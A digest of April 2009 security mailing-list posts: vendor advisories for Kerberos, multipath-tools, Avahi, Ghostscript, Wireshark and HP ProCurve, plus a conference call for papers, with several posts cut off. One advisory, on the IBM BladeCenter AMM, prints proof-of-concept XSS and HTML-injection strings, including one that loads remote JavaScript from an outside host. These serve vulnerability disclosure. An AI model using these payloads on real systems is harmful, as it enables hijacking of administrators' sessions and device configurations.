- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200904-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: MIT Kerberos 5: Multiple vulnerabilities Date: April 08, 2009 Bugs: #262736, #263398 ID: 200904-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilites in MIT Kerberos 5 might allow remote unauthenticated users to execute arbitrary code with root privileges. Background == MIT Kerberos 5 is a suite of applications that implement the Kerberos network protocol. kadmind is the MIT Kerberos 5 administration daemon, KDC is the Key Distribution Center. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-crypt/mit-krb5 1.6.3-r6 = 1.6.3-r6 Description === Multiple vulnerabilities have been reported in MIT Kerberos 5: * A free() call on an uninitialized pointer in the ASN.1 decoder when decoding an invalid encoding (CVE-2009-0846). * A buffer overread in the SPNEGO GSS-API application, reported by Apple Product Security (CVE-2009-0844). * A NULL pointer dereference in the SPNEGO GSS-API application, reported by Richard Evans (CVE-2009-0845). * An incorrect length check inside an ASN.1 decoder leading to spurious malloc() failures (CVE-2009-0847). Impact == A remote unauthenticated attacker could exploit the first vulnerability to cause a Denial of Service or, in unlikely circumstances, execute arbitrary code on the host running krb5kdc or kadmind with root privileges and compromise the Kerberos key database. Exploitation of the other vulnerabilities might lead to a Denial of Service in kadmind, krb5kdc, or other daemons performing authorization against Kerberos that utilize GSS-API or an information disclosure. Workaround == There is no known workaround at this time. Resolution == All MIT Kerberos 5 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-crypt/mit-krb5-1.6.3-r6 References == [ 1 ] CVE-2009-0844 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0844 [ 2 ] CVE-2009-0845 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0845 [ 3 ] CVE-2009-0846 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0846 [ 4 ] CVE-2009-0847 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0847 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200904-09.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
IBM BladeCenter Advanced Management Module Multiple vulnerabilities
Louhi Networks Information Security Research Security Advisory Advisory: IBM BladeCenter Advanced Management Module Multiple vulnerabilities (XSS type 2 1, CSRF, Information Disclosure) Release Date: 2009-04-09 Last Modified: 2009-04-09 Authors: Henri Lindberg [henri.lindb...@louhi.fi], CISA Device: IBM BladeCenter H AMM Main application: BPET36H Released: 03-20-08 Rev: 54 Risk: Low - Moderate High if Web Access is in active use and access to login page is unrestricted Vendor Status: Vendor notified, patch available. References: http://www.louhinetworks.fi/advisory/ibm_090409.txt Affected devices (from vendor): IBM BladeCenter E (1881, 7967, 8677) IBM BladeCenter H (7989, 8852) IBM BladeCenter HT (8740, 8750) IBM BladeCenter S (1948, 8886) IBM BladeCenter T (8720, 8730) IBM BladeCenter JS12 (7998) IBM BladeCenter JS21 (7988, 8844) IBM BladeCenter JS22 (7998) IBM BladeCenter HC10 (7996) IBM BladeCenter HS12 (8014, 1916, 8028) IBM BladeCenter HS20 (1883, 8843) IBM BladeCenter HS21 (8853, 1885) IBM BladeCenter HS21 XM (7995, 1915) IBM BladeCenter LS20 (8850) IBM BladeCenter LS21 (7971) IBM BladeCenter LS41 (7972) IBM BladeCenter QS21 (0792) IBM BladeCenter QS22 (0793) Overview: Quotes from http://www-03.ibm.com/systems/bladecenter/hardware/chassis/bladeh/index.html In today’s high-demand enterprise environment, organizations need a reliable infrastructure to run compute-intensive applications with minimal maintenance and downtime. IBM BladeCenter H is a powerful platform built with the enterprise customer in mind, providing industry-leading performance, innovative architecture and a solid foundation for virtualization. Provides easy integration to promote innovation and help manage growth, complexity and risk During a quick overview of BladeCenter AMM web access, it was discovered that web administration interface has multiple vulnerabilities regarding input and request validation. Details: Cross Site Scripting Type 2: --- Most serious issue discovered was the persistent XSS vulnerability on the event log page resulting from displaying unsanitized user input received from an invalid login attempt. This can be exploited without valid credentials or social engineering. Access to device administration IP address is needed and an administrator has to view event log at some point, however. Successful attack requires that an administrator visits event log page, thus enabling the attacker to control the chassis and blade configuration by running the injected content which is interpreted by the administrator's browser. For example, all blades can be shut down or new admnistrative users can be added, depending on administrator's access rights. Unsuccessful login attempts are displayed without HTML encoding or input sanitation in the event log. It is possible to inject a reference to a remote javascript file by using eg following username: /scriptscript src=//l7.fi/scriptscript Notes: If user input contains /script, dynamic javascript is spilled out on the page and it is quite easy to mess up formatting of the event log page. Log can be cleared by an authenticated administrator from URL: http://1.2.3.4/private/clearlog Event log javascript format: parent.LogEntryArray[i++] = new LogEntry( 1,2,Audit ,SN#420420313370,09/09/08,04:20:42,Remote login failed for user '/scriptscript src='//l7.fi'/scriptscript' from Web at IP 1.2.3.4); HTML-injection can be performed for example with following username: a href=private/clearlogMallory/a This results in: TDRemote login failed for user 'a href='private/clearlog' Mallory/a' from Web at IP 1.2.3.4/TD Entries from event log are also displayed on the AMM Service Data page. Type 1: --- File manager displays user input on the page as is. Successful exploitation requires social engineering an authenticated administrator to visit the hostile URL. Example URL: http://1.2.3.4/private/file_management.ssi? PATH=/etcscript%20src=http://l7.fi;/script Information Disclosure == A readonly operator (for example, a Blade operator with a scope assigment to one Blade) can view security permissions of other users (access roles and scopes) by forcefully browsing to their respective login profile pages: http://1.2.3.4/private/login.ssi?WEBINDEX=nJUNK=1 where n is the assigned integer value (1..12) of the user account Cross Site Request Forgery == BladeCenter AMM does not validate the origin of an HTTP request. If attacker is able to lure or force an
[SECURITY] [DSA 1767-1] New multipath-tools packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-1767-1secur...@debian.org http://www.debian.org/security/ Nico Golde April 9th, 2009 http://www.debian.org/security/faq - -- Package: multipath-tools Vulnerability : insecure file permissions Problem type : local Debian-specific: no CVE ID : CVE-2009-0115 Debian Bug : 522813 It was discovered that multipathd of multipath-tools, a tool-chain to manage disk multipath device maps, uses insecure permissions on its unix domain control socket which enables local attackers to issue commands to multipathd prevent access to storage devices or corrupt file system data. For the oldstable distribution (etch), this problem has been fixed in version 0.4.7-1.1etch2. For the stable distribution (lenny), this problem has been fixed in version 0.4.8-14+lenny1. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 0.4.8-15. We recommend that you upgrade your multipath-tools packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2.dsc Size/MD5 checksum: 794 96af45800ec71a9fcf8f811416ff90e7 http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7.orig.tar.gz Size/MD5 checksum: 179914 b14f35444f6fee34b6be49a79ebe9439 http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2.diff.gz Size/MD5 checksum:25941 971e214f6a43d817da8da4dcc3763443 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_alpha.deb Size/MD5 checksum: 189648 b656f97eb5932ef8a5c7da0f82a84137 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_amd64.deb Size/MD5 checksum: 176688 a51f613920761e339ed609d5894ce7eb hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_hppa.deb Size/MD5 checksum: 173368 2e4e0cd06f1da7b52763595e61ba500d i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_i386.deb Size/MD5 checksum: 150996 48c1d3875c6d379fc0a62e8c1e28666f mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_mips.deb Size/MD5 checksum: 178114 3fbf325989232f9d696a3bcfbfdf89d1 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_mipsel.deb Size/MD5 checksum: 176212 d72b286ae168caa5947cab12db6e8e2b powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_powerpc.deb Size/MD5 checksum: 161776 923e02c8131bbfd298bd2958637fc90b s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_s390.deb Size/MD5 checksum: 185228 b91cf8601d239237884cd0e03fa67b60 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.7-1.1etch2_sparc.deb Size/MD5 checksum: 154464 a36b4c818a9dbe7b7c8e61722a70dee6 Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.8-14+lenny1.dsc Size/MD5 checksum: 1375 04c428b50412dcfe7cefecce779bdd82 http://security.debian.org/pool/updates/main/m/multipath-tools/multipath-tools_0.4.8-14+lenny1.diff.gz Size/MD5 checksum:22746 ec09a8b773c890812f68c431024b89b2
[ GLSA 200904-10 ] Avahi: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200904-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Avahi: Denial of Service Date: April 08, 2009 Bugs: #260971 ID: 200904-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An error in Avahi might lead to a Denial of Service via network and CPU consumption. Background == Avahi is a system that facilitates service discovery on a local network. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 net-dns/avahi 0.6.24-r2 = 0.6.24-r2 Description === Rob Leslie reported that the originates_from_local_legacy_unicast_socket() function in avahi-core/server.c does not account for the network byte order of a port number when processing incoming multicast packets, leading to a multicast packet storm. Impact == A remote attacker could send specially crafted legacy unicast mDNS query packets to the Avahi daemon, resulting in a Denial of Service due to network bandwidth and CPU consumption. Workaround == There is no known workaround at this time. Resolution == All Avahi users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-dns/avahi-0.6.24-r2 References == [ 1 ] CVE-2009-0758 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0758 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200904-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
Secunia Research: Ghostscript jbig2dec JBIG2 Processing Buffer Overflow
== Secunia Research 09/04/2009 - Ghostscript jbig2dec JBIG2 Processing Buffer Overflow - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Ghostscript version 8.64 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: Remote == 3) Vendor's Description of Software An interpreter for the PostScript (TM) language, with the ability to convert PostScript language files to many raster formats, view them on displays, and print them on printers that don't have PostScript language capability built in; An interpreter for Portable Document Format (PDF) files, with the same abilities; ... Product Link: http://www.ghostscript.com/Ghostscript.html == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Ghostscript, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused due to a boundary error in the included jbig2dec library while decoding JBIG2 symbol dictionary segments. This can be exploited to cause a heap-based buffer overflow via a specially crafted PDF file. Successful exploitation may allow execution of arbitrary code. == 5) Solution Do not process untrusted PDF files. == 6) Time Table 26/03/2009 - Vendor notified. 26/03/2009 - vendor-sec notified. 02/04/2009 - Vendor response. 09/04/2009 - Public disclosure. == 7) Credits Discovered by Alin Rad Pop, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0196 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-21/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
[security bulletin] HPSBMA02420 SSRT071458 rev.1 - HP ProCurve Manager and HP ProCurve Manager Plus, Remote Unauthorized Access to Data
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01713073 Version: 1 HPSBMA02420 SSRT071458 rev.1 - HP ProCurve Manager and HP ProCurve Manager Plus, Remote Unauthorized Access to Data NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2009-04-08 Last Updated: 2009-04-08 Potential Security Impact: Remote unauthorized access to data Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified in HP ProCurve Manager and HP ProCurve Manager Plus. The vulnerability could allow remote unauthorized access to data on the ProCurve Manager server. References: CVE-2007-4514 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP ProCurve Manager v 2.3 and earlier HP ProCurve Manager Plus v 2.3 and earlier BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2007-4514 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. RESOLUTION HP has made the following software updates available to resolve the vulnerability. The updates are available from http://www.hp.com/rnd/software/network_management.htm ProCurve Manager 2.322/ProCurve Manager Plus 2.322 (Auto Update 10) ProCurve Manager 2.321/ProCurve Manager Plus 2.321 (Auto Update 10) PRODUCT SPECIFIC INFORMATION None HISTORY Version:1 (rev.1) - 8 April 2009 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement. ©Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will
[ MDVSA-2009:088 ] wireshark
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:088 http://www.mandriva.com/security/ ___ Package : wireshark Date: April 9, 2009 Affected: 2008.1, 2009.0, Corporate 4.0 ___ Problem Description: Multiple vulnerabilities has been identified and corrected in wireshark: o The PROFINET dissector was vulnerable to a format string overflow (CVE-2009-1210). o The Check Point High-Availability Protocol (CPHAP) dissecto could crash (CVE-2009-1268). o Wireshark could crash while loading a Tektronix .rf5 file (CVE-2009-1269). This update provides Wireshark 1.0.7, which is not vulnerable to these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1210 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1268 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1269 http://www.wireshark.org/security/wnpa-sec-2009-02.html ___ Updated Packages: Mandriva Linux 2008.1: 1dc62d022c4cbaa5ca9b07e089cd2a12 2008.1/i586/dumpcap-1.0.7-0.1mdv2008.1.i586.rpm 56a350f069b514514615d58a2c4d2cc0 2008.1/i586/libwireshark0-1.0.7-0.1mdv2008.1.i586.rpm 6b77a007c2f75ab0c048891ce01935ad 2008.1/i586/libwireshark-devel-1.0.7-0.1mdv2008.1.i586.rpm 0362de945cda3c60f97de2ffecc9cc62 2008.1/i586/rawshark-1.0.7-0.1mdv2008.1.i586.rpm 951fcc1d89f98da0a5eb4b9a40304d37 2008.1/i586/tshark-1.0.7-0.1mdv2008.1.i586.rpm 72feaee83f92f0889450c962b7620016 2008.1/i586/wireshark-1.0.7-0.1mdv2008.1.i586.rpm d4792c75c5dbf8f8d01f98a6bd03abf9 2008.1/i586/wireshark-tools-1.0.7-0.1mdv2008.1.i586.rpm cc39d293bcdde09757d7c8eee9cf09fc 2008.1/SRPMS/wireshark-1.0.7-0.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: bc85820ec0857eeccdc7a6beb33512c1 2008.1/x86_64/dumpcap-1.0.7-0.1mdv2008.1.x86_64.rpm 33d696120c8a6b2456cf32986e958d6a 2008.1/x86_64/lib64wireshark0-1.0.7-0.1mdv2008.1.x86_64.rpm c702bb0c37d362ad428020fd3504d14d 2008.1/x86_64/lib64wireshark-devel-1.0.7-0.1mdv2008.1.x86_64.rpm 2fdb45d92da41b695cfa5c4312f754b0 2008.1/x86_64/rawshark-1.0.7-0.1mdv2008.1.x86_64.rpm 622105a108c69497f97fa029545112fe 2008.1/x86_64/tshark-1.0.7-0.1mdv2008.1.x86_64.rpm 10f2f59bc26917a1345bc96eced4bdde 2008.1/x86_64/wireshark-1.0.7-0.1mdv2008.1.x86_64.rpm f7bc70beed52589f61f579629a1c39c8 2008.1/x86_64/wireshark-tools-1.0.7-0.1mdv2008.1.x86_64.rpm cc39d293bcdde09757d7c8eee9cf09fc 2008.1/SRPMS/wireshark-1.0.7-0.1mdv2008.1.src.rpm Mandriva Linux 2009.0: 5f374dee7a3e806aa8f55e222cf7a875 2009.0/i586/dumpcap-1.0.7-0.1mdv2009.0.i586.rpm 50c880fb63f1d29f970e08907eb17e6a 2009.0/i586/libwireshark0-1.0.7-0.1mdv2009.0.i586.rpm aecb17f6c08968009c2943a86b1ac134 2009.0/i586/libwireshark-devel-1.0.7-0.1mdv2009.0.i586.rpm 98ddaa9298f0dc2b9d9bcc6746e0a757 2009.0/i586/rawshark-1.0.7-0.1mdv2009.0.i586.rpm ce249c97cf2f80fba97c54f12386b60d 2009.0/i586/tshark-1.0.7-0.1mdv2009.0.i586.rpm fafb35021c36244cb71dd3c3664ada28 2009.0/i586/wireshark-1.0.7-0.1mdv2009.0.i586.rpm b672985920730bc14e03688ac56d6c50 2009.0/i586/wireshark-tools-1.0.7-0.1mdv2009.0.i586.rpm d5758cdd51c62cf50348b9b868262b1f 2009.0/SRPMS/wireshark-1.0.7-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: fde0562d4244fcd5c46bd426123bb762 2009.0/x86_64/dumpcap-1.0.7-0.1mdv2009.0.x86_64.rpm a94780e9a7fe2a90fef2ec6f76b1b4d3 2009.0/x86_64/lib64wireshark0-1.0.7-0.1mdv2009.0.x86_64.rpm cab3b23f1c2649c9035f396a6ac5b89a 2009.0/x86_64/lib64wireshark-devel-1.0.7-0.1mdv2009.0.x86_64.rpm 1d5d4f151b02eb721b2aa2391bef5b15 2009.0/x86_64/rawshark-1.0.7-0.1mdv2009.0.x86_64.rpm 0e80a0db6dc3243f35e18eb0e42ba6b6 2009.0/x86_64/tshark-1.0.7-0.1mdv2009.0.x86_64.rpm 596cbc632f8cb9d9bfd817b7e3449d79 2009.0/x86_64/wireshark-1.0.7-0.1mdv2009.0.x86_64.rpm caf11a295f23aad7100719ff3d0afe46 2009.0/x86_64/wireshark-tools-1.0.7-0.1mdv2009.0.x86_64.rpm d5758cdd51c62cf50348b9b868262b1f 2009.0/SRPMS/wireshark-1.0.7-0.1mdv2009.0.src.rpm Corporate 4.0: 0fa546e721b3dafeec3c8dd737d5f414 corporate/4.0/i586/dumpcap-1.0.7-0.1.20060mlcs4.i586.rpm b7e8cc21418e0876ea6fabbf5416aff5 corporate/4.0/i586/libwireshark0-1.0.7-0.1.20060mlcs4.i586.rpm 710a98dac2c3aaec7c71719e589ebab3 corporate/4.0/i586/libwireshark-devel-1.0.7-0.1.20060mlcs4.i586.rpm 327d0395e370053fb419921046bc35de corporate/4.0/i586/rawshark-1.0.7-0.1.20060mlcs4.i586.rpm 7e6f1992ea5affd89c7c22764c4cdaa1 corporate/4.0/i586/tshark-1.0.7-0.1.20060mlcs4.i586.rpm 4ea42e9e0ab0d057b730949bb9250dcd corporate/4.0/i586/wireshark-1.0.7-0.1.20060mlcs4.i586.rpm a6ea90713046fe7d842ee0eb1a2c6157
Reminder: RAID 2009 CFP
(We apologize if you receive multiple copies of this message) CALL FOR PAPERS RAID 2009 12th International Symposium on Recent Advances in Intrusion Detection 2009 September 23-25, 2009 Saint Malo, Brittany, France http://www.rennes.supelec.fr/RAID2009/ Topics: --- This symposium, the 12th in an annual series, brings together leading researchers and practitioners from academia, government, and industry to discuss issues and technologies related to intrusion detection and defense. The Recent Advances in Intrusion Detection (RAID) International Symposium series furthers advances in intrusion defense by promoting the exchange of ideas in a broad range of topics. As in previous years, all topics related to intrusion detection, prevention and defense systems and technologies are within scope, including but not limited to the following: * Network and host intrusion detection and prevention * Anomaly and specification-based approaches * IDS cooperation and event correlation * Malware prevention, detection, analysis and containment * Web application security * Insider attack detection * Intrusion response, tolerance, and self protection * Operational experience and limitations of current approaches * Intrusion detection assessment and benchmarking * Attacks against IDS including DoS, evasion, and IDS discovery * Formal models, analysis, and standards * Deception systems and honeypots * Vulnerability analysis, risk assessment, and forensics * Adversarial machine learning for security * Visualization techniques * Special environments, including mobile and sensor networks * High-performance intrusion detection * Legal, social, and privacy issues * Network exfiltration detection * Botnet analysis, detection, and mitigation Important Dates: Paper submission deadline:April 5, 2009 (Extended until: April 12, 2009, 23.59 PST) Paper acceptance or rejection:June 8, 2009 Final paper camera ready copy:June 18, 2009 Poster abstract submission deadline: June 20, 2009 Poster acceptance or rejection: June 28, 2009 Submissions: RAID 2009 invites two types of submissions: 1. Full papers presenting mature research results or summarizing operational experience protecting or monitoring large real-world networks. Papers can be 10-20 pages long and, if accepted, they will be presented and included in the RAID 2009 proceedings published by Springer Verlag in its Lecture Notes in Computer Science (http://www.springer.de/comp/lncs/index.html) series. Papers must be formatted according to the instructions provided by Springer Verlag (http://www.springer.de/comp/lncs/authors.html), and include an abstract and a list of keywords. 2. Posters describing innovative ideas not mature enough for a full paper and works in progress. A two-page poster abstract formatted as a full paper with an abstract must be submitted. If accepted, it will be published in the proceedings and the poster will be presented. All submissions (papers and poster abstracts) must be submitted electronically; details will be provided on the conference web site. Papers should list all authors and their affiliations; in case of multiple authors, the contact author must be indicated (RAID does not require anonymized submissions). For accepted papers, it is required that at least one of the authors attends the conference to present the paper. Further questions on the submission process may be sent to the program chair. Submissions must not substantially duplicate work that any of the authors has published elsewhere or has submitted in parallel to a journal or to any other conference or workshop with proceedings. Simultaneous submission of the same work to multiple venues, submission of previously published work, and plagiarism constitute dishonesty or fraud. RAID, like other scientific and technical conferences and journals, prohibits these practices and may, on the recommendation of the program chair, take action against authors who have committed them. Organizing Committee: - General Chair: Ludovic Me (Supelec, France, ludovic...@supelec.fr) Program Chair: Engin Kirda (Eurecom, France, ki...@eurecom.fr) Program Co-Chair: Somesh Jha (University of Wisconsin, USA, j...@cs.wisc.edu) Publication Chair: Davide Balzarotti (Eurecom, France, balzaro...@eurecom.fr) Publicity Chair: Corrado Leita (Symantec Research Europe, corrado_le...@symantec.com) Sponsorship Chair: Christophe Bidan (Supelec, France) Steering Committee: --- Chair: Marc Dacier (Symantec Research Europe) Herve Debar (France Telecom RD) Deborah Frincke (Pacific Northwest National Lab, USA) Ming-Yuh Huang (The
